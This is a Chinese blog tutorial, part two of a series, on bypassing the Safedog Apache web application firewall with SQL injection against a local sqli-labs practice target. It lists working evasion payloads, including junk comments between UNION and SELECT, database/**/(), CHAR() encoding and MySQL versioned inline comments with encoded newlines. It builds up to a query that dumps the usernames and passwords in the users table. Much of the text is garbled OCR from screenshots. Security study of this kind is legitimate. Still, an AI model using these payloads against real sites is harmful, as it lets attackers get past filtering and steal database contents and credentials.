SQL注入 安全狗apache3.5.12048版本绕过(下)

本文涉及的产品
Web应用防火墙 3.0,每月20元额度 3个月
简介: SQL注入 安全狗apache3.5.12048版本绕过

2. 测试and


直接使用and的时候,没有异常,但是使用and 1=1的时候,出现问题


正常

image.png

Welcome

Dhakkan

YANDARERGMYUS款mm心YMoe

曝样式编辑器

存储

口查吞器

网络

调试器

无障碍环境

性第

应用程序

内存

四控制台

AdblockPlus

HackTools

HackBar

Contributenow!

XSS

SQL

Other

Encoding

ncryption'

http://10.211.55.9/ess-/id-

LoADURL

and

--+

SplitURl



拦截


image.png

m

目口

10.211.55.9/Less-1/qid-1%20and%201%20

转到下一页

下拉显示历史

网站防火墙

您的请求带有不合法参数,已被网站管理员设置拦截!

可能原因:您提交的内容包含危险的攻击请求

如何解决:

内存日存储可无障碍环境

应用程序

性能

查看器

控制台调试器杯网络样式编辑器

AdblockPlus

HackBar

xSSOther

Encoding

Encryption

SQL

http://10.211.55.9/Less-/id-d

LoadURL

SplitURL

这里测试发现  and 可以出现,但是1不可以出现,既然无法绕过,这里尝试使用注释符来进行测试


3. 测试注释符


在这随机手写了一个,然后就过了。。。。


/*@%$^(*/

http://10.211.55.9/Less-1/?id=1'  and/*@%$^(*/ 1=1 --+

image.png

Dhakkan

Welcome

YourLogin

inname:Dumb

YourPassword:Dumb

日存储

一无障碍环境

样式编辑器

网络

口查看器

控制台

性能

应用程序

0内存

调试器

HackTools

AdblockPlus

HackBar

Encryption

XSS

Other

Encoding

SQL

LoadURL

http://10.211.55.9Le/%/

SplitURL

image.png

Dhakkan

Welcome

YourLogin

inname:Dumb

YourPassword:Dumb

日存储

一无障碍环境

样式编辑器

网络

口查看器

控制台

性能

应用程序

0内存

调试器

HackTools

AdblockPlus

HackBar

Encryption

XSS

Other

Encoding

SQL

LoadURL

http://10.211.55.9Le/%/

SplitURL

image.png

Dhakkan

Welcome

YourLogin

inname:Dumb

YourPassword:Dumb

日存储

一无障碍环境

样式编辑器

网络

口查看器

控制台

性能

应用程序

0内存

调试器

HackTools

AdblockPlus

HackBar

Encryption

XSS

Other

Encoding

SQL

LoadURL

http://10.211.55.9Le/%/

SplitURL


继续:


使用order by指令


http://10.211.55.9/Less-1/?id=1'  order by 4 --+




这里可以测出来一共存在三列,然后使用联合查询来试试


http://10.211.55.9/Less-1/?id=1'  union select 1,2,3 --+

image.png

10.211.55.9/Less-1/id1%2uonelc12

Bing

网站防火墙

您的请求带有不合法参数,已被网站管理员设置拦截

可能原因:您提交的内容包含危险的攻击请求

如何解决:

日存储

调试器此网络样式编辑器

内存

应用程序

查看器

无障碍环境

性能

控制台

AdblockPlus

HacKTo

HackBar

EncodingsQLXSSOther

Encryption

LoadURL

http://10.211.55.9/Less-/iinselc2

SplitURL

image.png

10.211.55.9/Less-1/id1%2uonelc12

Bing

网站防火墙

您的请求带有不合法参数,已被网站管理员设置拦截

可能原因:您提交的内容包含危险的攻击请求

如何解决:

日存储

调试器此网络样式编辑器

内存

应用程序

查看器

无障碍环境

性能

控制台

AdblockPlus

HacKTo

HackBar

EncodingsQLXSSOther

Encryption

LoadURL

http://10.211.55.9/Less-/iinselc2

SplitURL



如果只有union呢?试试


http://10.211.55.9/Less-1/?id=1'  union  --+ 正常



image.png

WelcomeDhakkan

YAMeAEAAIUS0XLOMDCORMDBOUMSALBOYBUULAOMAOUGTUALUIG

中查看器

此网络

日存储

调试器

样式编辑器

控制台

AdblockPlus器应用程序

性能

内存

无障碍环境

HackBar

HackTools

Encryption

SQL

xsszOther

Encoding

Cont

LOaDURL

http://10.211.55.9/Less-1/id1union

SplitURL


select呢

http://10.211.55.9/Less-1/?id=1'  union  select --+

gg

image.png

Bing

网站防火墙

您的请求带有不合法参数,已被网站管理员设置拦截!

可能原因:您提交的内容包含危险的攻击请求

如何解决:

茶中

日存储

]样式编辑器

摆你网络

调试器

应用程序

查看器

控制台

无障碍环境

性能

0内存

HackTools

ABPAdblockPlus

HackBar

Encryption

Encoding

Other

XSS

SQL

LoADURL

http://10.211.55.9/Less-/id-1

1unionselect-+

SpltURL

Execute

PostdataORefererOUserAgentoCookies

ClearAll


使用刚刚的注释符试试

http://10.211.55.9/Less-1/?id=1'  union /*@%$^(*/ select --+正常

image.png

Dhakkan

Welcome

UbeyanGrgYu50mbomeombooma

ne/9_9

内存

日存储

样式编辑器

照应用程序

无障碍环境

介网络

查看器

性能

调试器

控制台

AdblockPlus

HackTools

HackBar

XSS

Encryption

SQL

Other

Encoding

http://10.211.55.9/Less-/iduion/@%$/select

LOadURL

继续

http://10.211.55.9/Less-1/?id=1'  union /*@%$^(*/ select 1,2,3 --+显示正常

image.png

WelcomeDhakkan

YourLoginname:Dumb

YourPassword:Dumb

日存储

查看器

0内存

性能

无障碍环境

调试器

控制台

仪网络

样式编辑器

应用程序

AdblockPlus

HackBar

Encryption

SQL

XSS

Other

Encoding

http:/10.211.55.9Leio%/l2

LoadURL

SnlitURl


继续:

http://10.211.55.9/Less-1/?id=-1'  union /*@%$^(*/ select 1,2,3 --+

正常

image.png

Dhakkan

Welcome

YourLoginname:2

YourPassword:3

日存储

[样式编辑器

0内存

此网络

控制台

性能

调试器

查看器

无障碍环境

AdblockPlus

HackBar

ABP

Encoding

Encryption

XSS

SQL

Other

http://10.211.55.9/i2

LoadURL

SplitURL


那就可以来获得数据了

http://10.211.55.9/Less-1/?id=-1'  union /*@%$^(*/ select 1,2, database() --+


错误


image.png

网站防火墙

您的请求带有不合法参数,已被网站管理员设置拦截!

可能原因:您提交的内容包含危险的攻击请求

如何解决:

控制台

此网络

D调试器

性能刀内存

无障碍环境

查看器

样式编辑器

应用程序

AdblockPlus

存储

HackTools

HackBar

Encryption

XSS

SQL

Other

Encoding

LoaDURL

http://10.211.55.9Le-io%l.a

SplitURL


看来database()被过滤,那这里面对其进行绕过


4. 测试database()


在这里经过多次测试之后发现,database()可以使用database/**/()进行绕过

image.png

database/**

se1ect

mySq1

database

security

1

0.00

sec

in

set

row

http://10.211.55.9/Less-1/?id=  -1'  union   /*@%$^(*/    select 1,2, database/**/() --+

显示正常


image.png

Dhakkan

Welcome

YourLoginname:2

YourPassword:security

看器

日存储

无障碍环境

此网络

0内存

样式编辑器

调试器

性能

控制台

HackBar

AdblockPlus

Encoding

XSS

SQL

Other

n

http://10.211.559e-/dl

URL

URL


此时已经获得了数据库名称为security

继续操作来进行下一步,直到能够获取所有的关键信息

现在已知数据库之后,开始获取数据库中的表信息:

对第三个位置来获取表信息:

http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1--+ 查表,或者是:http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+ 查看所有的

试试:


http://10.211.55.9/Less-1/?id=  -1'  union   /*@%$^(*/    select 1,2,   table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1 --+

情理之中,开始准备fuzz

image.png

网站防火墙

您的请求带有不合法参数,已被网站管理员设置拦截!

可能原因:您提交的内容包含危险的攻击请求

如何解决:

检查提交内容;

2)如网站托管,请联系空间提供商;

3)普通网站访客,请联系网站管理员;

中查若器口控制台D调试器刊网络样式编据器性能0内存

日存储

一无障碍环境

暖应用程序

0p

HackTools

AdblockPlus

HackBar

Other

ryptionEncodingSQLXSS

地和选

LoadURL

SplitURL

Execute


http://10.211.55.9/Less-1/?id=  -1'  union   /*@%$^(*/    select 1,2,   table_name     --+


正常

image.png

Dhakkan

Welcome

Unknowncolumn'tablename'in'fieldlist

SQLIDUMBSERO

日存储

D调试器

日控制台

中查看器

样式编辑器

0内存

无障碍环境

性能

杯网络

应用程序

AdblockPlus

HackTools

HackBar

SQL

XSS

Encoding

Other

cryption

LOaDURL

http:/10.211.55.9L-%slt2la

--+


http://10.211.55.9/Less-1/?id=  -1'  union   /*@%$^(*/    select 1,2,   table_name   from  --+

此时显示异常


image.png

网站防火墙

您的请求带有不合法参数,已被网站管理员设置拦截!

可能原:您提交的内容包含危险的攻击请求

如何解决:

1)检查提交内容;

2)如网站托管,请联系空间提供商;

3)普通网站访客,请联系网站管理员;

日存储

无障碍环境

霸应用程序

门样式编辑器

0内存

性能

调试器

查君器

日控制台

网络

AdblockPlus

HackTools

HackBar

Other一

XSS

SQL

Encoding

ncryption

LOaDURL

htp//io.211.5592lm

SplitURL


经过fuzz发现,from是关键字,table_name   并不是关键字,所以需要对from进行绕过

经过多次多组fuzz发现,这里需要使用chr()来进行绕过

http://10.211.55.9/Less-1/?id=  -1'  union   /*@%$^(*/    select 1,2,   CHAR(102, 114, 111, 109)   --+

成功

image.png

Dhakkan

Welcome

YourLoginname:2

YourPassword:from

SOLIDUMBSHRO

贝性能

样式编辑器

你网络

日存储

D调试器

无障碍环境

0内存

应用程序

制台

HackTools

HackBar

AdblockPlus

xssOther

SQL

oding

http://10.211.55.9/Less-/?id

1union/@%S/select1.2CHA(102141)

--+

但是在这里是没法继续下去的


内联注释知识点

  • /*!select*/:  相当于没有注释
  • /*!12345select*/: 当12345小于当前mysql版本号的时候,注释不生效,当大于版本号的时候注释生效。
  • /*![]*/: []中括号中的数字若填写则必须是5位

mvsqiselect*51000version

54(42000:Youhaveanerror

ERROR1064

SQL

syntax;checkthe

that

in

manual

your

fortherightsyntaxtousen

at

correspondstoyourMySQLseryerersion

enear

iine1

mysqi>select*!41000versionO)*;

version

5,5.53

rowinset(0.00sec

mySq1>select*!49000versionO*;

version(

5,5.53


http://10.211.55.9/Less-1/?id=  -1'  union   /*!00000%23%0aselect*/  1,2, group_concat(schema_name)  /*!00000%23/*%0afrom */ information_schema.schemata   --+


image.png

Welcome

Dhakkan

YourLoginname:2

YourPasswordinfomionchmangesmspomaem

SQLIDUMDBSERODBS-

熊:应用程序

日存储

0内存

此网络

性能

AdblockPlus

调试器

控制台

无障碍环境

样式编锗器

查吞器

HackBar

HackTools

ContributenowlHackBarv

XSS

SQL

Encoding

yption

Other

啦如地心他

OADURL

/920information_schema.schemata%20%20%20--+

plitURL

Execute

PostdataORefereroUserAgentCcookies

ClearAIl


fuzz成功

这里使用

/*!%23/*%0afrom*/

http://10.211.55.9/Less-1/?id=  -1'  union   /*!00000%23%0aselect*/  1,2, group_concat(table_name)  /*!%23/*%0afrom*/ information_schema.tables where table_schema='security' --+

image.png

Dhakkan

Welcome

YourLoginname:2

YourPassword:emails,referers,u,

SQLIDUMBSBROES

吕存储

熊应用程序

样式编辑器

控制台

查看器

O内存

性能

网络

调试器

无障碍环境

AdblockPlus

HackBar

HackTools

Encryption-

Encoding

SQL

XSS

Contributenow!Hao

Other

LoaDURL

脚地

SpltURL

Execute


http://10.211.55.9/Less-1/?id=  -1'  union   /*!00000%23%0aselect*/  1,2, group_concat(column_name)  /*!%23/*%0afrom*/ information_schema.columns where table_name='users' --+


image.png

Welcome_Dhakkan

YourLoqinname:2

YourPassword:id,username,password

SQLIDUMBSHROES

中查看器

露应用程序

调试器

此网络

0内存

日存储

无障碍环境

性能

伊样式瑜辑器

AdblockPlus

控制台

HackBar

HackTodls

XSS

SQL

Other

ContributenowlHackBarv

encryption

Encoding

千叫@m

LOaDURL

http://10.211.55.9/Less-/2id

SplNtURL

Execute

OPostdata

ClearAII

Cookies

Referer

UserAgent

http://10.211.55.9/Less-1/?id=  -1'  union   /*!00000%23%0aselect*/  1,2,group_concat(concat_ws(0x7e, username, password))  /*!%23/*%0afrom*/ security.users --+

image.png

Dhakkan

welcome

YourLoginname:2

YourPassword:Dumb~Dumb,Angelina-ill-

UDCmYPgGd%YPmmm

SQLIDUMBSEROSS

日存储

门样式编器性能

O内存

可无障碍环境

口控制台

盟应用程序

词试器

查右器

网络

AdblockPlus

HackBar

HackTools

ContributenowlHackBarv2

XSS

SQL

Other

Encoding

Encryptlon

LoaDURL

地却取年叫1

SpltURL

M.

Execute

UserAgentOCookies

Postdata

ClearAIl

Reterer

image.png

Dhakkan

welcome

YourLoginname:2

YourPassword:Dumb~Dumb,Angelina-ill-

UDCmYPgGd%YPmmm

SQLIDUMBSEROSS

日存储

门样式编器性能

O内存

可无障碍环境

口控制台

盟应用程序

词试器

查右器

网络

AdblockPlus

HackBar

HackTools

ContributenowlHackBarv2

XSS

SQL

Other

Encoding

Encryptlon

LoaDURL

地却取年叫1

SpltURL

M.

Execute

UserAgentOCookies

Postdata

ClearAIl

Reterer

image.png

Dhakkan

welcome

YourLoginname:2

YourPassword:Dumb~Dumb,Angelina-ill-

UDCmYPgGd%YPmmm

SQLIDUMBSEROSS

日存储

门样式编器性能

O内存

可无障碍环境

口控制台

盟应用程序

词试器

查右器

网络

AdblockPlus

HackBar

HackTools

ContributenowlHackBarv2

XSS

SQL

Other

Encoding

Encryptlon

LoaDURL

地却取年叫1

SpltURL

M.

Execute

UserAgentOCookies

Postdata

ClearAIl

Reterer

tamper编写


后面出视频

相关文章
|
12天前
|
SQL 安全 数据库
惊!Python Web安全黑洞大曝光:SQL注入、XSS、CSRF,你中招了吗?
在数字化时代,Web应用的安全性至关重要。许多Python开发者在追求功能时,常忽视SQL注入、XSS和CSRF等安全威胁。本文将深入剖析这些风险并提供最佳实践:使用参数化查询预防SQL注入;通过HTML转义阻止XSS攻击;在表单中加入CSRF令牌增强安全性。遵循这些方法,可有效提升Web应用的安全防护水平,保护用户数据与隐私。安全需持续关注与改进,每个细节都至关重要。
48 5
|
14天前
|
SQL 安全 数据库
深度揭秘:Python Web安全攻防战,SQL注入、XSS、CSRF一网打尽!
在Web开发领域,Python虽强大灵活,却也面临着SQL注入、XSS与CSRF等安全威胁。本文将剖析这些常见攻击手段,并提供示例代码,展示如何利用参数化查询、HTML转义及CSRF令牌等技术构建坚固防线,确保Python Web应用的安全性。安全之路永无止境,唯有不断改进方能应对挑战。
42 5
|
15天前
|
SQL 存储 缓存
Apache Doris 2.1.6 版本正式发布
2.1.6 版本在 Lakehouse、异步物化视图、半结构化数据管理持续升级改进,同时在查询优化器、执行引擎、存储管理、数据导入与导出以及权限管理等方面完成了若干修复
|
13天前
|
SQL 安全 数据安全/隐私保护
Python Web安全大挑战:面对SQL注入、XSS、CSRF,你准备好了吗?
在构建Python Web应用时,安全性至关重要。本文通过三个真实案例,探讨了如何防范SQL注入、XSS和CSRF攻击。首先,通过参数化查询替代字符串拼接,防止SQL注入;其次,利用HTML转义机制,避免XSS攻击;最后,采用CSRF令牌验证,保护用户免受CSRF攻击。这些策略能显著增强应用的安全性,帮助开发者应对复杂的网络威胁。安全是一个持续的过程,需不断学习新知识以抵御不断变化的威胁。
63 1
|
13天前
|
SQL 安全 数据库
Python Web开发者必看!SQL注入、XSS、CSRF全面解析,守护你的网站安全!
在Python Web开发中,构建安全应用至关重要。本文通过问答形式,详细解析了三种常见Web安全威胁——SQL注入、XSS和CSRF,并提供了实用的防御策略及示例代码。针对SQL注入,建议使用参数化查询;对于XSS,需对输出进行HTML编码;而防范CSRF,则应利用CSRF令牌。通过这些措施,帮助开发者有效提升应用安全性,确保网站稳定运行。
28 1
|
15天前
|
SQL 安全 数据库
深度揭秘:Python Web安全攻防战,SQL注入、XSS、CSRF一网打尽!
在Web开发领域,Python虽强大灵活,但安全挑战不容小觑。本文剖析Python Web应用中的三大安全威胁:SQL注入、XSS及CSRF,并提供防御策略。通过示例代码展示如何利用参数化查询、HTML转义与CSRF令牌构建安全防线,助您打造更安全的应用。安全是一场持久战,需不断改进优化。
27 3
|
22天前
|
SQL 安全 数据库
从入门到精通:Python Web安全守护指南,SQL注入、XSS、CSRF全防御!
【9月更文挑战第13天】在开发Python Web应用时,安全性至关重要。本文通过问答形式,详细介绍如何防范SQL注入、XSS及CSRF等常见威胁。通过使用参数化查询、HTML转义和CSRF令牌等技术,确保应用安全。附带示例代码,帮助读者从入门到精通Python Web安全。
46 6
|
23天前
|
SQL 安全 JavaScript
告别Web安全小白!Python实战指南:抵御SQL注入、XSS、CSRF的秘密武器!
【9月更文挑战第12天】在Web开发中,安全漏洞如同暗礁,尤其对初学者而言,SQL注入、跨站脚本(XSS)和跨站请求伪造(CSRF)是常见挑战。本文通过实战案例,展示如何利用Python应对这些威胁。首先,通过参数化查询防止SQL注入;其次,借助Jinja2模板引擎自动转义机制抵御XSS攻击;最后,使用Flask-WTF库生成和验证CSRF令牌,确保转账功能安全。掌握这些技巧,助你构建更安全的Web应用。
16 5
|
2月前
|
存储 消息中间件 Java
Apache Flink 实践问题之原生TM UI日志问题如何解决
Apache Flink 实践问题之原生TM UI日志问题如何解决
36 1

推荐镜像

更多
下一篇
无影云桌面